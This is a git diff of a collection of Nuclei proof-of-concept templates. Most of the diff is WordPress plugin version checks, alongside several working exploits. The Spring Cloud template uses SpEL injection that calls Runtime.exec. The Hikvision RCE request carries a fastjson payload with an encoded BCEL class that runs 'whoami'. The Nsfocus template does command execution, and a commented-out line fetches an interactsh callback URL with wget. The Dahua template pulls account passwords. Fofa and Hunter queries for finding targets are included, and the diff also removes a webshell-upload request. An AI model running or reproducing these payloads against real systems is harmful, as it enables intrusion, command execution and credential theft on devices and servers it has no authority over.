"{{RootURL}}/../../../../../../functionRouter" + - "{{RootURL}}/../../../../../../;functionRouter" + - "{{RootURL}}/spring/functionRouter" + - "{{RootURL}}/admin/functionRouter" + - "{{RootURL}}/../../../../../../../../functionRouter" + - "{{RootURL}}../../../../../../../../api/functionRouter" + - "{{RootURL}}../../../../../../../../api/v1/functionRouter" + - "{{RootURL}}%2f%2e%2e%2f%2e%2e%2ffunctionRouter" + - "{{RootURL}}%2fspring%2ffunctionRouter" + - "{{RootURL}}%2fadmin%2functionRouter" + headers: + spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec("") + Content-Type: application/x-www-form-urlencoded + body: exp matchers-condition: and matchers: - - type: word - part: interactsh_protocol - words: - - "http" - - "dns" - condition: or - - - type: status - status: - - 500 -# digest: 490a0046304402205d6843e61f79f6f923c45f295fdbd23eb8553580f133f3595140c997e398c304022032df92fd24048679c909836db50aeef2682dfff4b5c6e8a8e844e32c0a7de57e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + - type: word + part: body + words: + - 'functionRouter' + - type: status + status: + - 500 \ No newline at end of file diff --git a/poc/other/Dahua_getUserInfoByUserName.yaml b/poc/other/Dahua_getUserInfoByUserName.yaml index 78d89c1465..77936cf562 100644 --- a/poc/other/Dahua_getUserInfoByUserName.yaml +++ b/poc/other/Dahua_getUserInfoByUserName.yaml @@ -1,29 +1,31 @@ id: Dahua info: - name: Dahua Smart Park Comprehensive Management Platform getFaceCapture SQL Injection Vulnerability + name: Dahua Smart Park Comprehensive Management Platform User_ GetUserInfoByUserName.action Account Password Disclosure Vulnerability author: Zero Trust Security Attack and Defense Laboratory - severity: high + severity: medium description: | - There is an SQL injection vulnerability in the getFaceCapture interface of Dahua Smart Park Comprehensive Management Platform, which allows attackers to execute arbitrary SQL statements and obtain sensitive database information through the vulnerability + Dahua Smart Park Comprehensive Management Platform User_ API interface exists in getUserInfoByUserName.action, which leads to password leakage of the management park account metadata: fofa-query: app="dahua-智慧园区综合管理平台" hunter-query: web.body="/WPMS/asset/lib/json2.js" - - http: - method: GET path: - - "{{BaseURL}}/portal/services/carQuery/getFaceCapture/searchJson/%7B%7D/pageJson/%7B%22orderBy%22:%221%20and%201=updatexml(1,concat(0x7e,(select%20md5(1)),0x7e),1)--%22%7D/extend/%7B%7D" + - "{{BaseURL}}/admin/user_getUserInfoByUserName.action?userName=system" matchers-condition: and matchers: - type: word part: body words: - - "c4ca" + - "loginName" + - "loginPass" - type: status status: - - 500 + - 200 + +# 获取后访问地址 +# /admin/login_login.action diff --git a/poc/other/Nsfocus_sas_getFile_read.yaml b/poc/other/Nsfocus_sas_getFile_read.yaml index 1cd783867f..b35ef84818 100644 --- a/poc/other/Nsfocus_sas_getFile_read.yaml +++ b/poc/other/Nsfocus_sas_getFile_read.yaml @@ -1,11 +1,11 @@ id: Green-Alliance info: - name: Green Alliance SAS Fortress GetFile Arbitrary File Read Vulnerability + name: Green Alliance SAS Fortress Exec Remote Command Execution Vulnerability author: Zero Trust Security Attack and Defense Laboratory - severity: medium + severity: high description: | - There is an arbitrary user login vulnerability in the Green Alliance Fortress machine, which allows attackers to exploit vulnerabilities including www/local_ User. php enables any user to log in + Green Alliance SAS Fortress Exec Remote Command Execution Vulnerability metadata: fofa-query: body="'/needUsbkey.php?username='" hunter-query: web.body="'/needUsbkey.php?username='" @@ -14,15 +14,36 @@ info: http: - method: GET path: - - "{{BaseURL}}/webconf/GetFile/index?path=../../../../../../../../../../../../../../etc/passwd" + - "{{BaseURL}}/webconf/Exec/index?cmd=id" matchers-condition: and matchers: - type: word part: body words: - - "nologin" + - "200" - type: status status: - 200 + + +# http: +# - method: GET +# path: +# - "{{BaseURL}}/webconf/Exec/index?cmd=wget%20{{interactsh-url}}" + +# attack: clusterbomb +# matchers-condition: or +# matchers: +# - type: word +# part: interactsh_protocol +# name: http +# words: +# - "http" + +# - type: word +# part: interactsh_protocol +# name: dns +# words: +# - "dns" diff --git a/poc/other/eventprime-event-calendar-management-601952a417648d8bd01a7751add339d9.yaml b/poc/other/eventprime-event-calendar-management-601952a417648d8bd01a7751add339d9.yaml new file mode 100644 index 0000000000..1e339ed191 --- /dev/null +++ b/poc/other/eventprime-event-calendar-management-601952a417648d8bd01a7751add339d9.yaml @@ -0,0 +1,59 @@ +id: eventprime-event-calendar-management-601952a417648d8bd01a7751add339d9 + +info: + name: > + EventPrime <= 4.0.4.3 - Missing Authorization to Unauthenticated Private or Password-Protected Events Disclosure + author: topscoder + severity: high + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/97174ec0-a2b7-455e-9bf8-b6f51546beee?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/eventprime-event-calendar-management/" + google-query: inurl:"/wp-content/plugins/eventprime-event-calendar-management/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,eventprime-event-calendar-management,high + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/eventprime-event-calendar-management/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "eventprime-event-calendar-management" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 4.0.4.3') \ No newline at end of file diff --git a/poc/other/frontend-dashboard-2071daaa8fb94694af774d99340ea9d4.yaml b/poc/other/frontend-dashboard-2071daaa8fb94694af774d99340ea9d4.yaml new file mode 100644 index 0000000000..3231184269 --- /dev/null +++ b/poc/other/frontend-dashboard-2071daaa8fb94694af774d99340ea9d4.yaml @@ -0,0 +1,59 @@ +id: frontend-dashboard-2071daaa8fb94694af774d99340ea9d4 + +info: + name: > + Frontend Dashboard <= 2.2.4 - Authenticated (Subscriber+) Arbitrary Function Call + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/7d66694a-c99f-44f8-8004-1a47ad9f9250?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/frontend-dashboard/" + google-query: inurl:"/wp-content/plugins/frontend-dashboard/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,frontend-dashboard,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/frontend-dashboard/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "frontend-dashboard" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.2.4') \ No newline at end of file diff --git a/poc/other/master-addons-66e3d4c0031beabde0083df515780997.yaml b/poc/other/master-addons-66e3d4c0031beabde0083df515780997.yaml new file mode 100644 index 0000000000..114411743b --- /dev/null +++ b/poc/other/master-addons-66e3d4c0031beabde0083df515780997.yaml @@ -0,0 +1,59 @@ +id: master-addons-66e3d4c0031beabde0083df515780997 + +info: + name: > + Master Addons – Free Widgets, Hover Effects, Toggle, Conditions, Animations for Elementor <= 2.0.6.4 - Authenticated (Contributor+) Stored Cross-Site Scripting via data-jltma-wrapper-link Element + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/8bab0acc-5a5d-4dd4-9201-199b7f5aaa69?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/master-addons/" + google-query: inurl:"/wp-content/plugins/master-addons/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,master-addons,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/master-addons/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "master-addons" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.0.6.4') \ No newline at end of file diff --git a/poc/other/nova-blocks-0e7c62abb845144ff6b6f8011c23237b.yaml b/poc/other/nova-blocks-0e7c62abb845144ff6b6f8011c23237b.yaml new file mode 100644 index 0000000000..c10da75a74 --- /dev/null +++ b/poc/other/nova-blocks-0e7c62abb845144ff6b6f8011c23237b.yaml @@ -0,0 +1,59 @@ +id: nova-blocks-0e7c62abb845144ff6b6f8011c23237b + +info: + name: > + Nova Blocks by Pixelgrade <= 2.1.7 - Authenticated (Contributor+) Stored Cross-Site Scripting via align Attribute + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/3011befd-c0c6-4800-a370-e592c3ec483f?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/nova-blocks/" + google-query: inurl:"/wp-content/plugins/nova-blocks/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,nova-blocks,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/nova-blocks/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "nova-blocks" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.1.7') \ No newline at end of file diff --git a/poc/other/peepso-core-4cd19fbbacd82d8d91e116054bffc182.yaml b/poc/other/peepso-core-4cd19fbbacd82d8d91e116054bffc182.yaml new file mode 100644 index 0000000000..9b5240583e --- /dev/null +++ b/poc/other/peepso-core-4cd19fbbacd82d8d91e116054bffc182.yaml @@ -0,0 +1,59 @@ +id: peepso-core-4cd19fbbacd82d8d91e116054bffc182 + +info: + name: > + Community by PeepSo – Social Network, Membership, Registration, User Profiles <= 6.4.5.0 - Authenticated (Administrator+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/e85ee611-ae81-4736-b4f0-b9d06714da18?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/peepso-core/" + google-query: inurl:"/wp-content/plugins/peepso-core/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,peepso-core,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/peepso-core/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "peepso-core" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 6.4.5.0') \ No newline at end of file diff --git a/poc/other/peepso-core-b2ac18e0119b47893588ba1a22162586.yaml b/poc/other/peepso-core-b2ac18e0119b47893588ba1a22162586.yaml new file mode 100644 index 0000000000..eb026fe539 --- /dev/null +++ b/poc/other/peepso-core-b2ac18e0119b47893588ba1a22162586.yaml @@ -0,0 +1,59 @@ +id: peepso-core-b2ac18e0119b47893588ba1a22162586 + +info: + name: > + Community by PeepSo – Social Network, Membership, Registration, User Profiles <= 6.4.5.0 - Authenticated (Administrator+) Stored Cross-Site Scripting via content Parameter + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/edf2e060-5ae4-4b46-bc68-22ae5f516fe8?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/peepso-core/" + google-query: inurl:"/wp-content/plugins/peepso-core/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,peepso-core,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/peepso-core/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "peepso-core" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 6.4.5.0') \ No newline at end of file diff --git a/poc/other/slider-comparison-image-before-and-after-22c03d521a5066baf973401bd293601e.yaml b/poc/other/slider-comparison-image-before-and-after-22c03d521a5066baf973401bd293601e.yaml new file mode 100644 index 0000000000..8b2c3b988b --- /dev/null +++ b/poc/other/slider-comparison-image-before-and-after-22c03d521a5066baf973401bd293601e.yaml @@ -0,0 +1,59 @@ +id: slider-comparison-image-before-and-after-22c03d521a5066baf973401bd293601e + +info: + name: > + Slider comparison image before and after <= 0.8.3 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/14ab5d7c-ab46-4a53-b0d2-8b331e204cf3?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/slider-comparison-image-before-and-after/" + google-query: inurl:"/wp-content/plugins/slider-comparison-image-before-and-after/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,slider-comparison-image-before-and-after,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/slider-comparison-image-before-and-after/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "slider-comparison-image-before-and-after" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 0.8.3') \ No newline at end of file diff --git a/poc/other/tutor-3b06cf3f3c9659ae3abd37923d73984e.yaml b/poc/other/tutor-3b06cf3f3c9659ae3abd37923d73984e.yaml new file mode 100644 index 0000000000..a630b73f32 --- /dev/null +++ b/poc/other/tutor-3b06cf3f3c9659ae3abd37923d73984e.yaml @@ -0,0 +1,59 @@ +id: tutor-3b06cf3f3c9659ae3abd37923d73984e + +info: + name: > + Tutor LMS <= 2.7.4 - Cross-Site Request Forgery via 'addon_enable_disable' + author: topscoder + severity: medium + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/992abd72-2a8e-4bda-94c2-4a7f88487906?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/tutor/" + google-query: inurl:"/wp-content/plugins/tutor/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,tutor,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/tutor/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "tutor" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.7.4') \ No newline at end of file diff --git a/poc/remote_code_execution/Hikvision_applyCT_RCE.yaml b/poc/remote_code_execution/Hikvision_applyCT_RCE.yaml index 7e328a8b1b..0ebd67934b 100644 --- a/poc/remote_code_execution/Hikvision_applyCT_RCE.yaml +++ b/poc/remote_code_execution/Hikvision_applyCT_RCE.yaml @@ -1,50 +1,27 @@ id: HIKVISION info: - name: HHIKVISION iVMS-8700 upload Webshell file - author: zerZero Trust Security Attack and Defense Laboratory + name: HIKVISION + author: Zero Trust Security Attack and Defense Laboratory severity: high description: | - HHIKVISION iVMS-8700 Comprehensive Security Management Platfor upload Webshell file + There is a command execution vulnerability in Hikvision's comprehensive security system. Hackers can execute system commands through the vulnerability metadata: - fofa-query: icon_hash="-911494769" - hunter-query: web.icon="3670cbb1369332b296ce44a94b7dd685" + fofa-query: app="HIKVISION-综合安防管理平台" + hunter-query: web.title="综合安防管理平台" -variables: - str0: '{{BaseURL}}/eps/api/resourceOperations/uploadsecretKeyIbuilding' - http: - raw: - | - POST /eps/api/resourceOperations/upload?token={{toupper(md5(str0))}} HTTP/1.1 + POST /bic/ssoService/v1/applyCT HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Android 3.2.5; Mobile; rv:51.0) Gecko/51.0 Firefox/51.0 - Accept-Encoding: gzip, deflate - Accept: */* - Connection: close - Content-Length: 184 - Content-Type: multipart/form-data; boundary=c4155aff43901a8b2a19a4641a5efa15 - - --c4155aff43901a8b2a19a4641a5efa15 - Content-Disposition: form-data; name="fileUploader"; filename="test.jsp" - Content-Type: image/jpeg - - {{randstr}} - --c4155aff43901a8b2a19a4641a5efa15-- - - - | - GET /eps/upload/{{name}}.jsp HTTP/1.1 - Host: {{Hostname}} - - extractors: - - type: json - name: name - json: - - ".data.resourceUuid" - internal: true + Content-Type: application/json + Testcmd: whoami + + {"CTGT": {"a": {"@type": "java.lang.Class", "val": "org.apache.tomcat.dbcp.dbcp2.BasicDataSource"}, "b": {"@type": "java.lang.Class", "val": "com.sun.org.apache.bcel.internal.util.ClassLoader"}, "c": {"@type": "org.apache.tomcat.dbcp.dbcp2.BasicDataSource", "driverClassLoader": {"@type": "com.sun.org.apache.bcel.internal.util.ClassLoader"}, "driverClassName": "$$BCEL$$$l$8b$I$A$A$A$A$A$A$A$a5Wyx$Ug$Z$ff$cd$5e3$3b$99$90dCB$W$uG$N$b09v$b7$a1$95B$c2$99$90$40J$S$u$hK$97P$db$c9$ec$q$3bd3$Tfg$J$a0$b6$k$d4$D$8fZ$8f$daPO$b4$ae$b7P$eb$s$U9$eaA$b1Z$8fzT$ad$d6zk$f1$f6$8f$da$f6$B$7c$bf$99$N$d9$84$ad$3c$3e$sy$be$f9$be$f7$7b$ef$f7$f7$be3y$fc$e2$p$a7$A$dc$80$7f$89$Q1$m$60P$84$PI$b6h$Cv$f3$Y$e2$91$f2$a3$E$c3$8c$a4$f30x$8c$88t$de$p$c2D$9a$JY$C2$ecr$_$8fQ$B$fb$E$ec$e7q$80$R$5e$c3$e3$b5$ec$f9$3a$R$d5$b8S$c4$5dx$3d$5b$de$m$e2$8dx$T$5b$O$K$b8$5bD7$de$cc$e3$z$ec$fcV$Bo$T$d1$84C$C$de$$$e0$j$3c$de$v$e0$5d$C$ee$R$f0n$k$f7$Kx$P$8f$f7$96$a0$B$efc$cb$fb$F$dc$t$e0$D$C$ee$e71$s$e00$T$bc$93$z$P$I$f8$a0$80$P$J$f8$b0$80$8f$88$f8$u$3e$c6$a8G$E$7c$5c$c0$t$E$3c$u$e0$93$C$b2$3c$3e$c5$e3$d3$o6$e03l$f9$ac$88$cf$e1$f3$o$d6$e3$L$C$be$c8$9eG$d9r$8c$89$3e$c4$7c$fc$S$d3$f4$b0$88$_$p$c7c$9c$83o$b5$a6k$d6Z$O$eeP$dd$z$i$3cmFB$e5P$d6$a5$e9jOf$b8_5$7b$e5$fe$UQ$fc$a3$a6f$a9$adFb$3f$879$a1$ae$dd$f2$5e9$9a$92$f5$c1$e8$d6$fe$dd$aab$b5$f4$b52$f1$d2$98$r$xC$dd$f2$88$zE$89$a4$U$da$b9$k$e2$m$b6$efS$d4$RK3$f44$H$ef$a0ju$90$c0$ca$o$aa$K$u1$cb$d4$f4$c1$96$ba$x$99xLPY8$I$ab$95$94$j$B$8f$e3$94$40$ca$_$r$97$c7$pd$_fdLE$ed$d0$98$fbe$bd$c6$b0$o$5b$edJ$d2$880$5d$Sz$b0$95C$ada$OF$e4$RYI$aa$R$cb$e6$88d$y$z$V$e9$cf$MDZ$f7$5bj$5b2$a3$PI8$81$afH8$89Sd$$$adZ$ec$82B$u$9b$f2$a9$z$r$a7$89$e2$eak$95p$gg$q$3c$8a$afr$u$9f$e94$87$8a$vR$a7n$a9$83$aa$c9$i$f9$g$8f$afK$f8$G$ceJx$M$e78$f0$Jc$H$cb$b6$84o2$3d$8bf$Y$ea1$ac$O$p$a3$t$$$e7$93C$rc$89$e8$9aa$7b$dd$9a$Z$YPM$w$e6$a8$v$8fpX8$r$dfc$c42J$b2$5b$b5$92$c6$94$b8$84$c7$f1$z$O$Lf$b2uhj$aa$90$eb$db8$c7$bc$7d$82R$_$e1$3b$f8$ae$84$ef$e1$fb$94v$JO$e2$H$S$7e$88$l$91$ebV$d2T$e5DZ$c2N$f4$91_$7d$F$95$eb$b5$afZ$q$fc$YO$91s$ea$3eU$91$f0$T$fc$94$f6I$cb$oG$7d$96l$S$$8$E$a6$84$b6gt$ddA$a0$cfJj$e9$da$eb$c8FR$d6$T$v$W$a0o0e$f4$cb$a9$7c$fc$8e$40AV$c4$R$d3P$d4t$da0$a98$b3l$WV$ddh$97$96$b6$q$fc$MO$b3$I$7eN$d07$d5$3d$iJ$c8$f4v5$3dB$f8dx$a7$d3fr$97$99$v$9f$JH$c2A$af$9a$b6TB$93$84_$e0$Zb$t$5c$Q$f6$ad$MY$f2$cb$89$c4$a4$u$cf$f8$94$e1$E$ed$8ctD$97$87$a9$v$7e$v$e1Y$fcJ$c2$afY$g$7c$a3$9a$9e0F$e9$9e$b8$o$94$T$82QT$a1c$b4_$d3$a3$e9$q$j$c3$ca$qpl$efc$8a$ac$ebLw$cd$94$5b$db$9c$40$5b3Z$w$e1$60$ea7$S$7e$8b$df$f1$f8$bd$84$3f$e0$8f$8c$f2$tR$b5k$83$84$e7p$5e$c2$9f$f1$94$84$bf$e0$af$S$b6$p$s$e1o$f8$3b$8f$7fH$f8$tsi$9eb$MG$H$e4$b4$b5$3bm$e8$d1$bd$99Tt$aay$a8$f9$a7$ac$9a$ea$40$8a$60$j$b5$812$zMN$a9g$d4$3f$df$cc$U$db$80a$f6P$w8$y$J$fd$f7f$b7$f1N$S$r$ba$3a$da$a9$a7$zYWHjv$a8$c8$40$m$U$f5$c6$b7$b5S$aa$8a$c8WP57$aaJJ6$d5$84$83$7e$O$eb$8b$d8$ee$bbB$b6$d0$d2d$bc$8e$Gf1$d4$c9$a6$5e$cd$cb$b1Py5$7d$af1D$3e$af$w63$af$q$V$NL$m$ef$f3$p$a62T$y$3d$M$ac$93$W$cb$LB$cd$X$s$7c$95$yO$ab$p$a9$x$r$V$b1$cc$88j$w$8e$d1$aab$f2l$da$T$e87$u$Mx$9a$dd$a1$9e$d0NFv$db$3d$bc$b4H$c0E$a3$xU2$a6$a9$ea$d6$qf$a6W7$3f4$a8$7fI$abs$d8d$g$Z$9a$W$c1$o$7c$f6$VC$Y1$3b$I$9b$ae$ed2$E$F$c5$d0$zYc$af$a2y$85$8e$b6$re3$a6$ee$c9$a8$E$b4$96$ba$9d$USZ$3b$a0$dao$c7N$96$88$ce$a2$n$f0Z$ba$7dx$c4$dao$f3$ed$9c$3e0$f6$d3$9c$Yv$a6$Lu$v$r$95$b1$z$bdJE$$$fbYb$Z$5d$c6$a8j$b6$c9l$uU$87$8a$f4$TK$b9$97Z$c3$b4$98$83$85Z$f2S$a1e$da$7b$tOt$S$da$a9$8fdhnQ$ea$86$d9k$3d$_$ac$Z$d1$82$L$S$af$J$V$bd$60$96$a5LZ$dd$a8$a6$b4az_$d1LZ$f6$f2$81$V$O$_$d6$3b$ba$ba$cfr$b0$9d$7f$a1zBu$7d$ad$O$fa$f2$99$d2$Y$b9$sT$a8$60$ea$86t$cc$$F$t$9d$96$e1$98$c6b$fa$e2$R$c1$7e$3c$e0$d8$x$9f$d6mt$ba$86$9e$i$3d$bd$f5$e3$e0$8e$d1$86$c3$cd$b4$fa$i$o$89$d0T$84$8b$b1r$a3$f4$91$e8$r$ea$8b$B$d7$E$dc$3d$e1$i$3c$dd$e1$80$d7w$S$be$b8$3b$c0$c7$e2$9e$87$m$c4$e2$5e$b6$e6$e0o$f4$9e$84$Yw7$Q$dd$d9$9d$40I$dc$3d$O$89$Il$dbp$8a$ed$89$b3tG$7d$O$b3$Ce$k$5bQ$98$u$e5$f5$k$5b$a2$d1$be$cd$e2P$b3$t$Q$b0m$G$w$3d$93$e6$c8D$d8$937Al$ddWS$d2$fe$ff$x9F$99$A$M$faN$ae$b0$9f$e3$98M$U$96$af$b5$u$a3$b5$83$f2$b6$89$b2$b4$99h$9dt$bf$9d8o$82$85$z8$80$$$dcG$rx$98h$e3$94$fe$e3T$80$d3$94$d5$a7$89$f3$F$f4$d2$_0$H$ee$e7a$f2x$d5$f3$d8$c8$e3$96$L$d8$c0c$H$8f$5b$R$cfW$ad$8e$caA$l$TN9$f0$A$dcv9Vr$b6$d7$U$96$f8$m$aa$c3$N9TugQ$da$ec$a1$C$cd$e9$c9$5ez$ae$f11H$tP$jo$YG$cd$e9FO$O$c1F$S$98$7b$944$96$a2$92$be$e4$ab$f3A$y$87D$eb$O$3a$dd$K$9e$y$95b$X$dd$dfF$f7$afF$Nn$t$ac$dc$81EPP$8b$E$c2$Y$m$feA$db$f1$Kx$$$80$e7$b1$8b$9c$ed$e1q$9b_$wpY$m$e1$3c$d8$dc$s$9dJ$A$d7$cd$ee$96$J$cc$cba$7e$e0$9a$J$y8$83$85$f4$d7$e5$5e3$bf$e1$d4$R$d7$f5$N$f3$97$f7$84$cf$ba$96$90$fb$8b$9a$3dAO$60q$O$d7$kvU$d1$ee$V$b4$hs$95$84$D$b5$q$d6$ec$Nz$l$c5$921$ee$a5$a07$b0$94$I$81el$J$d9WY$I$cd$be$y$f7$y$5d$d5$db$s$g$9a$7d$ee$V$7c$V$l$f4$jG$p$87$p$dc$a9$a0$af$8a$3f$8e$b0$L$cdBP$ID$f2$gY$fd$a3n$aa$3f$d5$3e$e8$a5$8dH$85o$f6$3b$X$d7$e5q$d3$U$b3o$3dyX7$c5$D$cb$c7q$3d$83$c8$Z41$9f$cfb$uH$89$be$e10$94$a0$9fI$be$d2$91tZ$a3$3c$e8$f7$5c$ee$88$K$9cc$7d$c0$e0$e5$b0$ae$f0N$g$89$7b$f2$96$fc$de$Z$96$e2d$c3$W$f1$b4$5c$cd$b3$hgz6$96$f7$ec$de$ff$c1$b3$c0$ca$J$ac$ca$a19$d0$c2$w$80$m$f5$7c$TY$5b$cd$5c$5cC$zO$dedQ$9d$a7$aee$d4u$O$b5Y$M$faO$60$7d$fc$E6$c4$83$e28Zsh$cba$e38$da$D$j9l$caas$O$9d$T$b8$89$e2$m$d7Jl$d7$c6P5w$M$VA$ff$E$b6$e4$d0$e50$Q$c5$97$85$ff$m$cfe$_$ae$9e$3c$b8$b8$ec$85$t$b2$f0la$8d$d9$D$99pYG$f0$earm$a5$a7$83$e9$p$I$d1$w$d0$c9O$cdZ$82$f9$84$f1E$84$ecZ$ccB$3d5$edZ$94S$dbV$90t$r$c9W$93$86$d9$84$ec$wh$84$f8$M$e6$e2$m$e6$e1$k$92$ba$9f$d0$7f$M$L$f0$M$W$e2$3c$Wq$d5X$ccu$e2Zn$L$96p$fb$b0$94$bb$h$cb$b8$a3$Iq$e7Q$e7$aa$40$bd$ab$92$90U$8b$88k9$9a$5c$x$b0$dc$b5$Ks$5d$eb$b0$c2$d5$86$h$5d$j$uqua$jy$b9$c6$b5$8d$feU$ed$b5$bb$ae$fc$o$aa9$k$L$b9K4$t$7c$f6$8e$c7$ed$3c$ee$a0$v$A$da$ca$d4d$b3x$f4s$X$f0$a4$3d$Yv$bc$84C$dby$uuR$c5$L$f0$bd$I$ef$r$g$3fn$5b$Q$f87$bc$ad$q$c3$e6y$82$d4$bb$a0$fe$H$d8$3e$ebc$Z$Q$A$A"}}} matchers: - type: word words: - - '{{randstr}}' + - "nt authority\\system" diff --git a/poc/remote_code_execution/spring-functions-rce.yaml b/poc/remote_code_execution/spring-functions-rce.yaml index 39a36176e1..f28360d6a7 100644 --- a/poc/remote_code_execution/spring-functions-rce.yaml +++ b/poc/remote_code_execution/spring-functions-rce.yaml @@ -1,56 +1,44 @@ id: CVE-2022-22963 info: - name: Spring Cloud - Remote Code Execution - author: Mr-xn,Adam Crosser + name: CVE-2022-22963 - Spring Cloud RCE + author: rdnt severity: critical - description: | - Spring Cloud Function versions 3.1.6, 3.2.2 and older unsupported versions are susceptible to remote code execution vulnerabilities. When using routing functionality it is possible for a user to provide a specially crafted SpEL as a routing-expression that may result in remote code execution and access to local resources. - impact: | - Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. - remediation: | - Apply the latest security patches provided by the Spring Cloud project to mitigate this vulnerability. - reference: - - https://github.com/spring-cloud/spring-cloud-function/commit/0e89ee27b2e76138c16bcba6f4bca906c4f3744f - - https://github.com/cckuailong/spring-cloud-function-SpEL-RCE - - https://tanzu.vmware.com/security/cve-2022-22963 - - 